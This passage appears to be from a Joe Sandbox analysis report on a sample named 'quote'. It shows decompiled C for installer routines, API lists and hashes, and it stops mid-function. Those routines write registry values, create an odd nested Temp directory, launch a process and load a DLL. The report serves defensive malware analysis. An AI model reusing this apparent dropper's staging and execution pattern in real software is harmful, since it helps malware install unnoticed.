                                                                                      • Instruction Fuzzy Hash: 6E41F0B17003059ADF10DF34D884FD63FACBF85365F10416AE9159EAC2DB74A184D7A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 83%
                                                                                      			E00402482(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                                                      				void* _t20;
                                                                                      				void* _t21;
                                                                                      				int _t24;
                                                                                      				long _t25;
                                                                                      				int _t30;
                                                                                      				intOrPtr _t33;
                                                                                      				void* _t34;
                                                                                      				intOrPtr _t37;
                                                                                      				void* _t39;
                                                                                      				void* _t42;
                                                                                      
                                                                                      				_t42 = __eflags;
                                                                                      				_t33 = __edx;
                                                                                      				_t30 = __ebx;
                                                                                      				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                                      				_t34 = __eax;
                                                                                      				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                                      				 *(_t39 - 0x44) = E00402D3E(2);
                                                                                      				_t20 = E00402D3E(0x11);
                                                                                      				 *(_t39 - 4) = 1;
                                                                                      				_t21 = E00402DCE(_t42, _t34, _t20, 2); // executed
                                                                                      				 *(_t39 + 8) = _t21;
                                                                                      				if(_t21 != __ebx) {
                                                                                      					_t24 = 0;
                                                                                      					if(_t37 == 1) {
                                                                                      						E00402D3E(0x23);
                                                                                      						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                                                      					}
                                                                                      					if(_t37 == 4) {
                                                                                      						 *0x40b5f0 = E00402D1C(3);
                                                                                      						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                                      						_t24 = _t37;
                                                                                      					}
                                                                                      					if(_t37 == 3) {
                                                                                      						_t24 = E0040324C( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800);
                                                                                      					}
                                                                                      					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
                                                                                      					if(_t25 == 0) {
                                                                                      						 *(_t39 - 4) = _t30;
                                                                                      					}
                                                                                      					_push( *(_t39 + 8));
                                                                                      					RegCloseKey();
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *(_t39 - 4);
                                                                                      				return 0;
                                                                                      			}













                                                                                      0x00402482
                                                                                      0x00402482
                                                                                      0x00402482
                                                                                      0x00402482
                                                                                      0x00402485
                                                                                      0x0040248c
                                                                                      0x00402496
                                                                                      0x00402499
                                                                                      0x004024a2
                                                                                      0x004024a9
                                                                                      0x004024b0
                                                                                      0x004024b3
                                                                                      0x004024b9
                                                                                      0x004024c3
                                                                                      0x004024c7
                                                                                      0x004024d2
                                                                                      0x004024d2
                                                                                      0x004024d9
                                                                                      0x004024e3
                                                                                      0x004024e9
                                                                                      0x004024ec
                                                                                      0x004024ec
                                                                                      0x004024f0
                                                                                      0x004024fc
                                                                                      0x004024fc
                                                                                      0x0040250d
                                                                                      0x00402515
                                                                                      0x00402517
                                                                                      0x00402517
                                                                                      0x0040251a
                                                                                      0x004025f5
                                                                                      0x004025f5
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd599A.tmp,00000023,00000011,00000002), ref: 004024CD
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd599A.tmp,00000000,00000011,00000002), ref: 0040250D
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsd599A.tmp,00000000,00000011,00000002), ref: 004025F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsd599A.tmp
                                                                                      • API String ID: 2655323295-3447684723
                                                                                      • Opcode ID: e949525387f2bbf957712f10692e3855dbe23a3db20d8a415a3f903535603d74
                                                                                      • Instruction ID: 7edbd774ff12736b5c68cca40ff53a8b2e2340a941a441eef078c8e93cf21856
                                                                                      • Opcode Fuzzy Hash: e949525387f2bbf957712f10692e3855dbe23a3db20d8a415a3f903535603d74
                                                                                      • Instruction Fuzzy Hash: 1C11AF71E00108BEDB00AFA5CE49AAEBBB8EF44314F20443AF504B71D1D7B89D409A68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 86%
                                                                                      			E004015C1(short __ebx, void* __eflags) {
                                                                                      				void* _t17;
                                                                                      				int _t23;
                                                                                      				void* _t25;
                                                                                      				signed char _t26;
                                                                                      				short _t28;
                                                                                      				short _t31;
                                                                                      				short* _t34;
                                                                                      				void* _t36;
                                                                                      
                                                                                      				_t28 = __ebx;
                                                                                      				 *(_t36 + 8) = E00402D3E(0xfffffff0);
                                                                                      				_t17 = E00405D91(_t16);
                                                                                      				_t32 = _t17;
                                                                                      				if(_t17 != __ebx) {
                                                                                      					do {
                                                                                      						_t34 = E00405D13(_t32, 0x5c);
                                                                                      						_t31 =  *_t34;
                                                                                      						 *_t34 = _t28;
                                                                                      						if(_t31 != _t28) {
                                                                                      							L5:
                                                                                      							_t25 = E004059C5( *(_t36 + 8));
                                                                                      						} else {
                                                                                      							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                      							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E004059E2(_t42) == 0) {
                                                                                      								goto L5;
                                                                                      							} else {
                                                                                      								_t25 = E00405948( *(_t36 + 8)); // executed
                                                                                      							}
                                                                                      						}
                                                                                      						if(_t25 != _t28) {
                                                                                      							if(_t25 != 0xb7) {
                                                                                      								L9:
                                                                                      								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                      							} else {
                                                                                      								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                      								if((_t26 & 0x00000010) == 0) {
                                                                                      									goto L9;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						 *_t34 = _t31;
                                                                                      						_t32 = _t34 + 2;
                                                                                      					} while (_t31 != _t28);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                      					_push(0xfffffff5);
                                                                                      					E00401423();
                                                                                      				} else {
                                                                                      					E00401423(0xffffffe6);
                                                                                      					E00406411(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption\\Dioxide\\Spokeswoman\\Gelatinous\\Passado195",  *(_t36 + 8));
                                                                                      					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                      					if(_t23 == 0) {
                                                                                      						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                      					}
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t36 - 4));
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x004015c1
                                                                                      0x004015c9
                                                                                      0x004015cc
                                                                                      0x004015d1
                                                                                      0x004015d5
                                                                                      0x004015d7
                                                                                      0x004015df
                                                                                      0x004015e1
                                                                                      0x004015e4
                                                                                      0x004015ea
                                                                                      0x00401604
                                                                                      0x00401607
                                                                                      0x004015ec
                                                                                      0x004015ec
                                                                                      0x004015ef
                                                                                      0x00000000
                                                                                      0x004015fa
                                                                                      0x004015fd
                                                                                      0x004015fd
                                                                                      0x004015ef
                                                                                      0x0040160e
                                                                                      0x00401615
                                                                                      0x00401624
                                                                                      0x00401624
                                                                                      0x00401617
                                                                                      0x0040161a
                                                                                      0x00401622
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00401622
                                                                                      0x00401615
                                                                                      0x00401627
                                                                                      0x0040162b
                                                                                      0x0040162c
                                                                                      0x004015d7
                                                                                      0x00401634
                                                                                      0x00401663
                                                                                      0x004022e9
                                                                                      0x00401636
                                                                                      0x00401638
                                                                                      0x00401645
                                                                                      0x0040164d
                                                                                      0x00401655
                                                                                      0x0040165b
                                                                                      0x0040165b
                                                                                      0x00401655
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                        • Part of subcall function 00405D91: CharNextW.USER32(?,?,0042FA70,?,00405E05,0042FA70,0042FA70,75A33420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75A33420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D9F
                                                                                        • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DA4
                                                                                        • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DBC
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                        • Part of subcall function 00405948: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040598B
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195,?,00000000,000000F0), ref: 0040164D
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195, xrefs: 00401640
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195
                                                                                      • API String ID: 1892508949-539529829
                                                                                      • Opcode ID: b8ced0bbdff828fada69f254c36b3a2cde61058eacd7c981d6ee30a213b234d1
                                                                                      • Instruction ID: d42e9ae115e382ed64a017e661d14a8570f8e1ce7a364987760287960e16c3b9
                                                                                      • Opcode Fuzzy Hash: b8ced0bbdff828fada69f254c36b3a2cde61058eacd7c981d6ee30a213b234d1
                                                                                      • Instruction Fuzzy Hash: B411DD31504110EBCF206FA5CD4199F3BB0EF25369B28493BEA51B22F1DA3E49819A5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004059FA(WCHAR* _a4) {
                                                                                      				struct _PROCESS_INFORMATION _v20;
                                                                                      				int _t7;
                                                                                      
                                                                                      				0x430270->cb = 0x44;
                                                                                      				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
                                                                                      				if(_t7 != 0) {
                                                                                      					CloseHandle(_v20.hThread);
                                                                                      					return _v20.hProcess;
                                                                                      				}
                                                                                      				return _t7;
                                                                                      			}





                                                                                      0x00405a03
                                                                                      0x00405a23
                                                                                      0x00405a2b
                                                                                      0x00405a30
                                                                                      0x00000000
                                                                                      0x00405a36
                                                                                      0x00405a3a

                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 00405A23
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405A30
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 00405A0D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                      • Instruction ID: 9b609aa4dbda1b40da6c9694c56aee9f908f129f2491f8ac19b90d9f5f8e4f4b
                                                                                      • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                      • Instruction Fuzzy Hash: 19E0B6B4600209BFEB109FA4EE49F7B7AACEB04708F004565BD50F6191DBB8EC158A7C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 60%
                                                                                      			E004020D0(void* __ebx, void* __eflags) {
                                                                                      				struct HINSTANCE__* _t23;
                                                                                      				struct HINSTANCE__* _t31;
                                                                                      				void* _t32;
                                                                                      				WCHAR* _t35;
                                                                                      				intOrPtr* _t36;
                                                                                      				void* _t37;
                                                                                      				void* _t39;
                                                                                      
                                                                                      				_t32 = __ebx;
                                                                                      				asm("sbb eax, 0x434fd8");
                                                                                      				 *(_t39 - 4) = 1;
                                                                                      				if(__eflags < 0) {
                                                                                      					_push(0xffffffe7);
                                                                                      					L15:
                                                                                      					E00401423();
                                                                                      					L16:
                                                                                      					 *0x434fa8 =  *0x434fa8 +  *(_t39 - 4);
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t35 = E00402D3E(0xfffffff0);
                                                                                      				 *((intOrPtr*)(_t39 - 0x44)) = E00402D3E(1);
                                                                                      				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                                                      					L3:
                                                                                      					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                                                      					_t47 = _t23 - _t32;
                                                                                      					 *(_t39 + 8) = _t23;
                                                                                      					if(_t23 == _t32) {
                                                                                      						_push(0xfffffff6);
                                                                                      						goto L15;
                                                                                      					}
                                                                                      					L4:
                                                                                      					_t36 = E00406875(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                                                      					if(_t36 == _t32) {
                                                                                      						E00405479(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                                                      					} else {
                                                                                      						 *(_t39 - 4) = _t32;
                                                                                      						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                                                      							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                                                      						} else {
                                                                                      							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                                                      							if( *_t36() != 0) {
                                                                                      								 *(_t39 - 4) = 1;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403A80( *(_t39 + 8)) != 0) {
                                                                                      						FreeLibrary( *(_t39 + 8));
                                                                                      					}
                                                                                      					goto L16;
                                                                                      				}
                                                                                      				_t31 = GetModuleHandleW(_t35); // executed
                                                                                      				 *(_t39 + 8) = _t31;
                                                                                      				if(_t31 != __ebx) {
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				goto L3;
                                                                                      			}










                                                                                      0x004020d0
                                                                                      0x004020d0
                                                                                      0x004020d5
                                                                                      0x004020dc
                                                                                      0x0040219b
                                                                                      0x004022e9
                                                                                      0x004022e9
                                                                                      0x00402bc2
                                                                                      0x00402bc5
                                                                                      0x00402bd1
                                                                                      0x00402bd1
                                                                                      0x004020eb
                                                                                      0x004020f5
                                                                                      0x004020f8
                                                                                      0x00402108
                                                                                      0x0040210c
                                                                                      0x00402112
                                                                                      0x00402114
                                                                                      0x00402117
                                                                                      0x00402194
                                                                                      0x00000000
                                                                                      0x00402194
                                                                                      0x00402119
                                                                                      0x00402124
                                                                                      0x00402128
                                                                                      0x00402168
                                                                                      0x0040212a
                                                                                      0x0040212d
                                                                                      0x00402130
                                                                                      0x0040215c
                                                                                      0x00402132
                                                                                      0x00402135
                                                                                      0x0040213e
                                                                                      0x00402140
                                                                                      0x00402140
                                                                                      0x0040213e
                                                                                      0x00402130
                                                                                      0x00402170
                                                                                      0x00402189
                                                                                      0x00402189
                                                                                      0x00000000
                                                                                      0x00402170
                                                                                      0x004020fb
                                                                                      0x00402103
                                                                                      0x00402106
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                                                                                        • Part of subcall function 00405479: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,00000000,00425A20,75A323A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                        • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,00000000,00425A20,75A323A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                        • Part of subcall function 00405479: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,004033B0), ref: 004054D4
                                                                                        • Part of subcall function 00405479: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll), ref: 004054E6
                                                                                        • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                        • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                        • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 334405425-0
                                                                                      • Opcode ID: 2a06d31b931b49bf2f8db5931c22a0a40424257b118d3c815d54da95721802d9
                                                                                      • Instruction ID: ec066b6349dd7fa10fed5d852794e64c7c96c86c32cb5d354c2886168094fa20
                                                                                      • Opcode Fuzzy Hash: 2a06d31b931b49bf2f8db5931c22a0a40424257b118d3c815d54da95721802d9
                                                                                      • Instruction Fuzzy Hash: A7219931500104EBCF10AFA5CE49A9E7A71AF44354F34413BF515B51E0CBBD9D829A1D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 59%
                                                                                      			E00401B9B(void* __ebx) {
                                                                                      				intOrPtr _t8;
                                                                                      				void* _t9;
                                                                                      				void _t12;
                                                                                      				void* _t14;
                                                                                      				void* _t22;
                                                                                      				void* _t25;
                                                                                      				void* _t30;
                                                                                      				char* _t32;
                                                                                      				void* _t33;
                                                                                      				void* _t34;
                                                                                      				void* _t37;
                                                                                      
                                                                                      				_t28 = __ebx;
                                                                                      				_t8 =  *((intOrPtr*)(_t37 - 0x28));
                                                                                      				_t33 =  *0x40ce50; // 0x0
                                                                                      				if(_t8 == __ebx) {
                                                                                      					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
                                                                                      						_t9 = GlobalAlloc(0x40, 0x804); // executed
                                                                                      						_t34 = _t9;
                                                                                      						_t5 = _t34 + 4; // 0x4
                                                                                      						E0040644E(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
                                                                                      						_t12 =  *0x40ce50; // 0x0
                                                                                      						 *_t34 = _t12;
                                                                                      						 *0x40ce50 = _t34;
                                                                                      					} else {
                                                                                      						if(_t33 == __ebx) {
                                                                                      							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                                                      						} else {
                                                                                      							_t3 = _t33 + 4; // 0x4
                                                                                      							E00406411(_t30, _t3);
                                                                                      							_push(_t33);
                                                                                      							 *0x40ce50 =  *_t33;
                                                                                      							GlobalFree();
                                                                                      						}
                                                                                      					}
                                                                                      					goto L15;
                                                                                      				} else {
                                                                                      					while(1) {
                                                                                      						_t8 = _t8 - 1;
                                                                                      						if(_t33 == _t28) {
                                                                                      							break;
                                                                                      						}
                                                                                      						_t33 =  *_t33;
                                                                                      						if(_t8 != _t28) {
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							if(_t33 == _t28) {
                                                                                      								break;
                                                                                      							} else {
                                                                                      								_t36 = _t33 + 4;
                                                                                      								_t32 = L"Call";
                                                                                      								E00406411(_t32, _t33 + 4);
                                                                                      								_t22 =  *0x40ce50; // 0x0
                                                                                      								E00406411(_t36, _t22 + 4);
                                                                                      								_t25 =  *0x40ce50; // 0x0
                                                                                      								_push(_t32);
                                                                                      								_push(_t25 + 4);
                                                                                      								E00406411();
                                                                                      								L15:
                                                                                      								 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t37 - 4));
                                                                                      								_t14 = 0;
                                                                                      							}
                                                                                      						}
                                                                                      						goto L17;
                                                                                      					}
                                                                                      					_push(0x200010);
                                                                                      					_push(E0040644E(_t28, _t30, _t33, _t28, 0xffffffe8));
                                                                                      					E00405A77();
                                                                                      					_t14 = 0x7fffffff;
                                                                                      				}
                                                                                      				L17:
                                                                                      				return _t14;
                                                                                      			}














                                                                                      0x00401b9b
                                                                                      0x00401b9b
                                                                                      0x00401b9e
                                                                                      0x00401ba6
                                                                                      0x00401bef
                                                                                      0x00401c1d
                                                                                      0x00401c26
                                                                                      0x00401c28
                                                                                      0x00401c2c
                                                                                      0x00401c31
                                                                                      0x00401c36
                                                                                      0x00401c38
                                                                                      0x00401bf1
                                                                                      0x00401bf3
                                                                                      0x00402925
                                                                                      0x00401bf9
                                                                                      0x00401bf9
                                                                                      0x00401bfe
                                                                                      0x00401c05
                                                                                      0x00401c06
                                                                                      0x00401c0b
                                                                                      0x00401c0b
                                                                                      0x00401bf3
                                                                                      0x00000000
                                                                                      0x00401ba8
                                                                                      0x00401ba8
                                                                                      0x00401ba8
                                                                                      0x00401bab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00401bb1
                                                                                      0x00401bb5
                                                                                      0x00000000
                                                                                      0x00401bb7
                                                                                      0x00401bb9
                                                                                      0x00000000
                                                                                      0x00401bbf
                                                                                      0x00401bbf
                                                                                      0x00401bc2
                                                                                      0x00401bc9
                                                                                      0x00401bce
                                                                                      0x00401bd8
                                                                                      0x00401bdd
                                                                                      0x00401be2
                                                                                      0x00401be6
                                                                                      0x00402a7b
                                                                                      0x00402bc2
                                                                                      0x00402bc5
                                                                                      0x00402bcb
                                                                                      0x00402bcb
                                                                                      0x00401bb9
                                                                                      0x00000000
                                                                                      0x00401bb5
                                                                                      0x00402382
                                                                                      0x0040238f
                                                                                      0x00402390
                                                                                      0x00402395
                                                                                      0x00402395
                                                                                      0x00402bcd
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree
                                                                                      • String ID: Call
                                                                                      • API String ID: 3394109436-1824292864
                                                                                      • Opcode ID: 42b2de40b6c5b0198a0de44629896a35e2f8d08660007165ae3c3fcb72a5982b
                                                                                      • Instruction ID: bf14f8cf48d280ad10deff957409e7ec0fbe11b3568df8ef6b08dac15d949b91
                                                                                      • Opcode Fuzzy Hash: 42b2de40b6c5b0198a0de44629896a35e2f8d08660007165ae3c3fcb72a5982b
                                                                                      • Instruction Fuzzy Hash: 5221A872600114DBD720AF94CE85E5A73B4BB04718725053BFA52F72D0D7BCAC508BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 86%
                                                                                      			E00402596(int* __ebx, intOrPtr __edx, short* __edi) {
                                                                                      				void* _t9;
                                                                                      				int _t10;
                                                                                      				long _t13;
                                                                                      				int* _t16;
                                                                                      				intOrPtr _t21;
                                                                                      				short* _t22;
                                                                                      				void* _t24;
